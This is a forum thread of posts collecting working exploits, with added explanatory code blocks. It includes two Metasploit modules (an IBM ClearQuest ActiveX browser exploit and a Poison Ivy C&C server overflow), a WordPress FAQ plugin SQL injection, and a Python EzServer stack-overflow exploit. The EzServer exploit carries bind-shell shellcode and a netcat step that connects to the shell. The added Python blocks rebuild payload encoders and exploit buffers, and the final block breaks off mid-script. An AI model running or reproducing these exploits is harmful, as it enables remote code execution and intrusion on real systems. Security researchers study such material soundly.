Posts posted by The_Arhitect

  1. IBM Rational ClearQuest CQOle Remote Code Execution

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::HttpServer::HTML
      include Msf::Exploit::Remote::BrowserAutopwn
      autopwn_info({
        :ua_name    => HttpClients::IE,
        :ua_minver  => "6.0",
        :ua_maxver  => "7.0",
        :javascript => true,
        :os_name    => OperatingSystems::WINDOWS,
        :classid    => "{94773112-72E8-11D0-A42E-00A024DED613}",
        :method     => "RegisterSchemaRepoFromFileByDbSet",
        :rank       => NormalRanking
      })

      def initialize(info={})
        super(update_info(info,
          'Name'        => "IBM Rational ClearQuest CQOle Remote Code Execution",
          'Description' => %q{
            This module exploits a function prototype mismatch in the CQOle ActiveX
            control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which
            allows reliable remote code execution when DEP isn't enabled.
          },
          'License'     => MSF_LICENSE,
          'Author'      =>
            [
              'Andrea Micalizzi aka rgod', # Vulnerability discovery
              'juan vazquez'               # Metasploit module
            ],
          'References'  =>
            [
              [ 'CVE', '2012-0708' ],
              [ 'BID', '53170' ],
              [ 'OSVDB', '81443' ],
              [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ],
              [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ],
            ],
          'Payload'     =>
            {
              'BadChars' => "\x00"
            },
          'DefaultOptions' =>
            {
              'ExitFunction'         => "process",
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Platform'    => 'win',
          'Targets'     =>
            [
              # cqole.dll 7.1100.0.150
              [ 'Automatic', {} ],
              [ 'IE 6 / IE7 (No DEP)', {} ], # The nature of the vulnerability requires DEP to be disabled
            ],
          'Privileged'  => false,
          'DisclosureDate' => "May 19 2012",
          'DefaultTarget'  => 0))
      end

      def get_target(agent)
        # If the target was already specified by the user, we'll just use that
        return target if target.name != 'Automatic'

        if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
          return targets[1] # IE 6 on Windows XP
        elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
          return targets[1] # IE 7 on Windows XP
        elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
          return targets[1] # IE 7 on Windows Vista
        else
          return nil
        end
      end

      def on_request_uri(cli, request)
        agent = request.headers['User-Agent']
        my_target = get_target(agent)

        # Avoid the attack if the victim doesn't have the same setup we're targeting
        if my_target.nil?
          print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
          send_not_found(cli)
          return
        end

        # The payload is passed as a %uXXXX string for JavaScript's unescape();
        # it becomes the second (unexpected) argument of RegisterSchemaRepoFromFileByDbSet
        js_code     = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch))
        object_id   = rand_text_alpha(rand(8) + 4)
        dbset_value = rand_text_alpha(rand(8) + 4)
        var_payload = rand_text_alpha(rand(8) + 4)

        html = <<-EOS
          <html>
          <body>
          <object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object>
          <script language="JavaScript">
            var #{var_payload} = unescape("#{js_code}")
            #{object_id}.RegisterSchemaRepoFromFileByDbSet("#{dbset_value}", #{var_payload});
          </script>
          </body>
          </html>
        EOS

        # Strip the heredoc's leading indentation
        html = html.gsub(/^[ \t]+/, '')

        print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
        send_response(cli, html, {'Content-Type'=>'text/html'})

      end

    end

    =begin

    * RegisterSchemaRepoFromFile, not RegisterSchemaRepoFromFileByDbSet, is what gets called:

    Breakpoint 0 hit
    eax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c
    eip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0 nv up ei pl nz na pe nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
    MFC80U!_AfxDispatchCall+0xe:
    78371062 ffd0 call eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)}

    * RegisterSchemaRepoFromFile prototype (the one that is going to be executed):

    .text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *)

    Its ret is: retn 4

    * RegisterSchemaRepoFromFileByDbSet prototype (the one that should be executed):

    .text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *)

    Its ret is: retn 8

    * When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall, this is what happens:

    0:000> p
    eax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c
    eip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0 nv up ei pl nz na po nc
    cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
    MFC80U!_AfxDispatchCall+0x10:
    78371064 c3 ret
    0:000> dd esp
    0013e208 001dcff4 7835f5d2 fffffffe 78336a3a

    ESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet, not to the saved EIP on
    the stack: the callee cleaned up only 4 bytes of arguments (retn 4) where the dispatcher pushed 8.
    The ret from MFC80U!_AfxDispatchCall therefore pops the attacker-controlled second argument (the
    pointer to the unescaped payload) into EIP, which gives control reliably when DEP is disabled.

    =end

    Source: IBM Rational ClearQuest CQOle Remote Code Execution
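An added example, not part of the module above or of Metasploit: what the `Rex::Text.to_unescape` call on the `js_code` line produces, and why the bytes have to be swapped into each `%uXXXX` unit. The padding byte for odd-length input is my choice (the original's is not shown on the page); the byte strings are constructed samples, not shellcode.

```python
import struct


def to_unescape(data, little_endian=True):
    """Encode bytes as the %uXXXX string that JavaScript's unescape() turns
    back into UTF-16 code units (what the module's js_code line does).

    unescape("%u4241") yields code unit 0x4241, which a little-endian x86
    process stores as the bytes 41 42. So for b0 b1 to land in memory in that
    order the unit must be (b1 << 8) | b0: every pair is read as a little-endian
    u16. Odd-length input is padded with one 0x90 (NOP); that padding byte is an
    assumption of this example, the page does not show the original's.
    """
    if len(data) % 2:
        data += b"\x90"
    fmt = ("<" if little_endian else ">") + "%dH" % (len(data) // 2)
    return "".join("%%u%04x" % unit for unit in struct.unpack(fmt, data))


def from_unescape(text, little_endian=True):
    """Inverse: the bytes the browser ends up holding after unescape()."""
    fmt = "<H" if little_endian else ">H"
    return b"".join(struct.pack(fmt, int(unit, 16))
                    for unit in text.split("%u") if unit)


if __name__ == "__main__":
    sample = b"\x90\x90\xcc\xcc\x41"          # constructed, not shellcode
    encoded = to_unescape(sample)
    print(encoded)
    assert from_unescape(encoded).startswith(sample)
```

The round trip is the check worth keeping: if `from_unescape(to_unescape(x))` does not start with `x`, the payload would land in the BSTR byte-swapped and the first instruction executed would not be the one you encoded.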

  2. Poison Ivy 2.3.2 C&C Server Buffer Overflow

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # web site for more information on licensing and terms of use.
    # http://metasploit.com/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = NormalRanking

      include Msf::Exploit::Remote::Tcp
      include Msf::Exploit::Brute

      def initialize(info = {})
        super(update_info(info,
          'Name'        => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
          'Description' => %q{
            This module exploits a stack buffer overflow in the Poison Ivy 2.3.2 C&C server.
            The exploit does not need to know the password chosen for the bot/server
            communication. If the C&C is configured with the default 'admin' password,
            the exploit should work fine. If the C&C is configured with another
            password the exploit can fail. The 'check' command can be used to determine
            whether the C&C target is using the default 'admin' password.

            Hopefully an exploit attempt won't crash the Poison Ivy C&C process, just the thread
            responsible for handling the connection. Because of this the module provides the
            RANDHEADER option and a bruteforce target. If RANDHEADER is set, a random header
            will be used. If the bruteforce target is selected, a random header will be sent in
            case the default header for the password 'admin' doesn't work. Bruteforce will stop
            after 5 tries or once a session is obtained.
          },
          'License'     => MSF_LICENSE,
          'Author'      =>
            [
              'Andrzej Dereszowski', # Vulnerability Discovery
              'Gal Badishi',         # Exploit and Metasploit module
              'juan vazquez'         # Testing and little of Metasploit-fu
            ],
          'References'  =>
            [
              [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
              [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
            ],
          'DisclosureDate' => "Jun 24 2012",
          'DefaultOptions' =>
            {
              'EXITFUNC' => 'thread',
            },
          'Payload'     =>
            {
              'StackAdjustment' => -4000,
              'Space'           => 10000,
              'BadChars'        => "",
            },
          'Platform'    => 'win',
          'Targets'     =>
            [
              [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
                {
                  'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
                  'RWAddress'     => 0x00401000,
                  'Offset'        => 0x806D,
                  'PayloadOffset' => 0x75,
                  'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
                }
              ],
              [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
                {
                  'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
                  'RWAddress'     => 0x00401000,
                  'Offset'        => 0x806D,
                  'PayloadOffset' => 0x75,
                  'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp
                  'Bruteforce'    =>
                    {
                      'Start' => { 'Try' => 1 },
                      'Stop'  => { 'Try' => 6 },
                      'Step'  => 1,
                      'Delay' => 2
                    }
                }
              ],
            ],
          'DefaultTarget' => 0
        ))

        register_options(
          [
            Opt::RPORT(3460),
            OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
          ], self.class)

        register_advanced_options(
          [
            OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
          ], self.class)

      end

      def check
        sig    = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
        lensig = [0x000015D0].pack("V")

        connect
        sock.put("\x00" * 256)
        response = sock.read(256)
        datalen  = sock.read(4)
        disconnect

        if datalen == lensig
          if response[0, 16] == sig
            print_status("Password appears to be \"admin\"")
          else
            print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
          end
          return Exploit::CheckCode::Vulnerable
        end
        return Exploit::CheckCode::Safe
      end

      def single_exploit
        if datastore['RANDHEADER'] == true
          # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
          header = rand_text(0x20)
        else
          # This is the 32-byte header we want to send, encrypted with the default password ("admin")
          # We have a very good chance of succeeding even if the password was changed
          header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
        end
        do_exploit(header)
      end

      def brute_exploit(brute_target)
        if brute_target['Try'] == 1
          print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password")
          # This is the 32-byte header we want to send, encrypted with the default password ("admin")
          # We have a very good chance of succeeding even if the password was changed
          header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
        else
          print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header")
          # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
          header = rand_text(0x20)
        end
        do_exploit(header)
      end

      def do_exploit(header)
        # Handshake
        connect
        print_status("Performing handshake...")
        sock.put("\x00" * 256)
        sock.get

        # Don't change the nulls, or it might not work
        xploit = ''
        xploit << header
        xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
        xploit << payload.encoded
        xploit << "\x00" * (target['Offset'] - xploit.length)
        xploit << [target.ret].pack("V")          # ret to a jmp esp opcode
        xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by the original ret 4 (esp will point to the next dword)
        xploit << target['jmpPayload']            # This comes immediately after ret - it is a setup for the payload (jmp back)

        # The disconnection triggers the exploit
        print_status("Sending exploit...")
        sock.put(xploit)
        select(nil,nil,nil,5)
        disconnect
      end

    end

    =begin

    * ROP version of exploit(): discarded for the moment for two reasons:

    (1) Poison Ivy fails to run on DEP-enabled systems (maybe due to the unpacking process)
    (2) When trying an unpacked version on DEP-enabled systems the windows/exec payload runs, but meterpreter does not

    =end

    Source: Poison Ivy 2.3.2 C&C Server Buffer Overflow
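An added example, not part of the module above: the buffer `do_exploit()` sends, laid out with the target table's values so the offsets can be checked before anything is put on the wire, together with the handshake classification that `check` performs. The arithmetic worth seeing is the last line of the layout: after the function's own `ret 4` skips `RWAddress`, `jmp esp` runs the 8-byte stub, and `sub esp,0x8000` must bring ESP back exactly to `PayloadOffset`. The shellcode here is a placeholder of INT3s; no connection is made.

```python
import struct

# Values from the module's target table
TARGET = {
    "Ret":           0x0041AA97,   # jmp esp inside "Poison Ivy 2.3.2.exe"
    "RWAddress":     0x00401000,   # readable/writeable dword eaten by the function's own 'ret 4'
    "Offset":        0x806D,       # bytes from the start of the buffer to the saved return address
    "PayloadOffset": 0x75,         # where the shellcode is placed
    "jmpPayload":    b"\x81\xec\x00\x80\x00\x00\xff\xe4",  # sub esp,0x8000 ; jmp esp
}

# 32-byte header the module sends, pre-encrypted for the default "admin" password
ADMIN_HEADER = (b"\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf"
                b"\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7")

SIG    = b"\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
LENSIG = struct.pack("<I", 0x15D0)


def build_exploit(header, shellcode, target=TARGET):
    """Lay the buffer out exactly as do_exploit() does. The null padding is not
    decorative: the module warns the exploit may not work if it is changed."""
    if len(header) != 32:
        raise ValueError("header must be 32 bytes")
    buf = bytearray(header)
    buf += b"\x00" * (target["PayloadOffset"] - len(buf))
    buf += shellcode
    if len(buf) > target["Offset"]:
        raise ValueError("shellcode runs into the saved return address")
    buf += b"\x00" * (target["Offset"] - len(buf))
    buf += struct.pack("<I", target["Ret"])        # overwrites saved EIP -> jmp esp
    buf += struct.pack("<I", target["RWAddress"])  # skipped by the original 'ret 4'
    buf += target["jmpPayload"]                    # ESP lands here: sub esp,0x8000 ; jmp esp
    return bytes(buf)


def describe_layout(buf, target=TARGET):
    """Offsets of the pieces, plus where the stub's 'jmp esp' ends up after
    'sub esp,0x8000': it has to land on the shellcode at PayloadOffset."""
    jmp_at = buf.index(target["jmpPayload"])
    return {
        "ret_at":     buf.index(struct.pack("<I", target["Ret"])),
        "rw_at":      buf.index(struct.pack("<I", target["RWAddress"])),
        "jmp_at":     jmp_at,
        "jmp_target": jmp_at - 0x8000,
        "len":        len(buf),
    }


def classify_handshake(response, datalen):
    """Mirror of the module's check(): 256 nulls are sent, 256 bytes and a
    4-byte length come back. The length identifies 2.3.2; the first 16 bytes
    of the response match SIG only when the password is still 'admin'."""
    if datalen != LENSIG:
        return ("safe", False)
    return ("vulnerable", response[:16] == SIG)


if __name__ == "__main__":
    buf = build_exploit(ADMIN_HEADER, b"\xcc" * 32)   # INT3 placeholder, not shellcode
    print({k: hex(v) for k, v in describe_layout(buf).items()})
```

`describe_layout` is the pre-flight check: if `jmp_target` is not `0x75`, either the stub's immediate or `PayloadOffset` was edited and the jump-back would land in the null padding.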

  3. WordPress Website FAQ Plugin v1.0 SQL Injection

    # Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
    # Date: 6/25/12
    # Exploit Author: Chris Kellum
    # Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
    # Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
    # Version: 1.0


    ==============================================================================
    Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
    ==============================================================================

    Lines 106-115:

    function displayAnswer()
    {
        global $wpdb;
        $master_table = $wpdb->prefix . "faq";
        $category = $_POST['category'];
        $searchtxt = $_POST['searchtxt'];
        if($category!=0)
        {
            $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
        }

    ===============================================================
    Vulnerability Details: faq_category vulnerable to SQL injection
    ===============================================================

    When submitting a query via the widget, intercept the post request via burp or other proxy to find the following:

    action=displayAnswer&category=1&searchtxt=[your query]

    Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value.

    Source: WordPress Website FAQ Plugin v1.0 SQL Injection
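An added example, not the plugin's code: the `displayAnswer()` query rebuilt over an in-memory SQLite table, once by string concatenation as the plugin does it and once with bound parameters, both run with the page's `category=1 or 1=1 --` input. In WordPress the parameterised form is `$wpdb->prepare()` with `%d` and `%s`; SQLite and `?` placeholders stand in for it here. The table rows are constructed sample data.

```python
import sqlite3


def make_faq_db():
    """Constructed stand-in for the wp_faq table (sample rows, not real data)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_faq (faq_category INTEGER, faq_question TEXT)")
    db.executemany("INSERT INTO wp_faq VALUES (?, ?)", [
        (1, "How do I reset my password?"),
        (1, "Where do I find invoices?"),
        (2, "Can I export a report?"),
    ])
    return db


def display_answer_vulnerable(db, category, searchtxt):
    """The plugin's query, built by concatenation: both POST fields go straight
    into SQL, so a category of `1 or 1=1 -- ` comments out the LIKE clause and
    every row comes back regardless of searchtxt."""
    sql = ("SELECT * FROM wp_faq WHERE faq_category=" + category +
           " AND faq_question LIKE '%" + searchtxt + "%'")
    return db.execute(sql).fetchall()


def display_answer_fixed(db, category, searchtxt):
    """Same query with placeholders. The category is forced to an integer
    (anything else is rejected) and the search text is bound as a value, so
    it can only ever be compared, never parsed as SQL."""
    try:
        cat = int(category)
    except ValueError:
        return []
    sql = "SELECT * FROM wp_faq WHERE faq_category=? AND faq_question LIKE ?"
    return db.execute(sql, (cat, "%" + searchtxt + "%")).fetchall()


if __name__ == "__main__":
    db = make_faq_db()
    print("vulnerable:", display_answer_vulnerable(db, "1 or 1=1 -- ", "no-such-question"))
    print("fixed:     ", display_answer_fixed(db, "1 or 1=1 -- ", "no-such-question"))
```

The difference to look for is the row count with a nonsense `searchtxt`: the concatenated query returns all three rows because the `LIKE` clause was commented away, the bound query returns none.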

  4. Ezhometech Ezserver 6.4 Stack Overflow Exploit

    # Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
    # Author: modpr0be
    # Contact: research[at]Spentera[dot]com
    # Platform: Windows
    # Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
    # Software Link: http://www.ezhometech.com/buy_ezserver.htm
    # References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/

    ### Software Description
    # EZserver is a video server that streams Full HD to various devices.

    ### Vulnerability Details
    # A buffer overflow condition exists in URL handling; sending a long GET request
    # will cause the server process to exit and may allow malicious code injection.
    # Further research found that the application does not care about the HTTP method,
    # so sending a long string of characters will crash the program whatever the method.

    ### Vendor logs:
    # 06/11/2012 -  Bug found
    # 06/12/2012 -  Vendor contacted
    # 06/16/2012 -  No response from vendor, PoC released.

    #!/usr/bin/python

    import sys
    import struct
    from socket import *
    from os import system
    from time import sleep

    hunt = (
    "\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
    "\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
    "\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
    "\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

    #windows/shell_bind_tcp - 751 bytes
    #http://www.metasploit.com
    #Encoder: x86/alpha_upper
    #AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,

    shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
    "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
    "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
    "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
    "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
    "\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
    "\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
    "\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
    "\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
    "\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
    "\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
    "\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
    "\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
    "\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
    "\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
    "\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
    "\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
    "\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
    "\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
    "\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
    "\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
    "\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
    "\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
    "\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
    "\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
    "\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
    "\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
    "\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
    "\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
    "\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
    "\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
    "\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
    "\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
    "\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
    "\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
    "\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
    "\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
    "\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
    "\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
    "\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
    "\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
    "\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
    "\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
    "\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
    "\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
    "\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
    "\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
    "\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
    "\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
    "\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
    "\x41")

    junk1 = "\x41" * 5025                    # padding up to the overwritten pointer on XP SP3
    junk2 = "\x42" * 5029                    # same for Windows 2003 SP2 (offset differs by 4)
    junk3 = "\x43" * 10000                   # crash-only buffer
    buff = "w00tw00t"                        # egg tag the hunter searches for, doubled
    buff+= shellcode
    buff+= "\x90" * 100
    buff+= "\xeb\x08\x90\x90"                # jmp short +8: skips over the dword that follows
    buff+= struct.pack('<L', 0x10212779)     # address the overwritten pointer is redirected to
    buff+= "\x90" * 16
    buff+= hunt                              # egghunter: locates "w00tw00t" and jumps past it
    buff+= "\x44" * 5000

    def winxp():
        try:
            host = raw_input("[!] Target IP: ")
            print "[!] Connecting to %s on port 8000" %host
            s = socket(AF_INET, SOCK_STREAM)
            s.connect((host,8000))
            print "[+] Launching attack.."
            print "[+] Sending payload.."
            payload = junk1+buff
            s.send(payload)
            s.close()
            print "[+] Wait for hunter.."
            sleep(5)
            print "[+] Connecting to target shell!"
            sleep(2)
            system("nc -v %s 4444" %host)
        except:
            print "[x] Could not connect to the server x_x"
            sys.exit()

    def win2k3():
        try:
            host = raw_input("[!] Target IP: ")
            print "[!] Connecting to %s on port 8000" %host
            s = socket(AF_INET, SOCK_STREAM)
            s.connect((host,8000))
            print "[+] Launching attack.."
            print "[+] Sending payload.."
            payload = junk2+buff
            s.send(payload)
            s.close()
            print "[+] Wait for hunter.."
            sleep(5)
            print "[+] Connecting to target shell!"
            sleep(1)
            system("nc -v %s 4444" %host)
        except:
            print "[x] Could not connect to the server x_x"
            sys.exit()

    def crash():
        try:
            host = raw_input("[!] Target IP: ")
            print "[!] Connecting to %s on port 8000" %host
            s = socket(AF_INET, SOCK_STREAM)
            s.connect((host,8000))
            print "[+] Launching attack.."
            print "[+] Sending payload.."
            payload = junk3
            s.send(payload)
            s.close()
            print "[+] Server should be crashed! Check your debugger"
        except:
            print "[x] Could not connect to the server x_x"
            sys.exit()

    print "#################################################################"
    print "#      EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit   #"
    print "#      by modpr0be[at]spentera | @modpr0be                      #"
    print "#      thanks to: otoy, cikumel, y0k | @spentera                #"
    print "================================================================="
    print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
    print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
    print "\t3.Crash only (debug)\n"

    a = 0
    while a < 3:
        a = a + 1
        op = input("[!] Choose your target OS: ")
        if op == 1:
            winxp()
            sys.exit()
        elif op == 2:
            win2k3()
            sys.exit()
        elif op == 3:
            crash()
            sys.exit()
        else:
            print "[-] Oh plz.. pick the right one \r\n"

    Source: Ezhometech Ezserver 6.4 Stack Overflow Exploit
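An added example, not part of the exploit above: what the `hunt` stub does, written out in Python. The bytes `B8 77 30 30 74` in the stub are `mov eax, 0x74303077`, i.e. the tag `w00t`; the hunter walks memory looking for that dword twice in a row and jumps to the byte after the second copy, which is why `buff` starts with `"w00tw00t"` followed by the shellcode. The memory image searched here is a constructed byte string; the real stub also probes each page with a system call before reading it, which a byte string does not need.

```python
import struct

# The stub from the exploit above, copied here so the tag can be pulled from it
HUNT_STUB = (b"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
             b"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
             b"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
             b"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")


def egg_from_stub(stub):
    """The tag is the immediate of the stub's `mov eax, imm32` (opcode 0xB8)."""
    i = stub.index(b"\xb8")
    return stub[i + 1:i + 5]


EGG = egg_from_stub(HUNT_STUB)   # b"w00t"


def hunt(memory, start=0):
    """Return the offset just past a doubled egg ("w00tw00t"), or None.

    Mirrors the stub's two `scasd` / `jne` checks: the dword at the candidate
    and the one right after it must both equal the tag, so a single stray
    "w00t" in memory (or the tag inside the stub itself) is not a hit.
    """
    i = memory.find(EGG, start)
    while i != -1:
        if memory[i + 4:i + 8] == EGG:
            return i + 8
        i = memory.find(EGG, i + 1)
    return None


def stage(shellcode):
    """What the exploit places ahead of the shellcode: buff = "w00tw00t" + shellcode."""
    return EGG * 2 + shellcode


if __name__ == "__main__":
    # constructed memory image: noise, a lone tag, then the staged shellcode
    image = b"\x90" * 100 + b"w00t" + b"\x00" * 4 + stage(b"\xcc" * 8) + b"\x00" * 16
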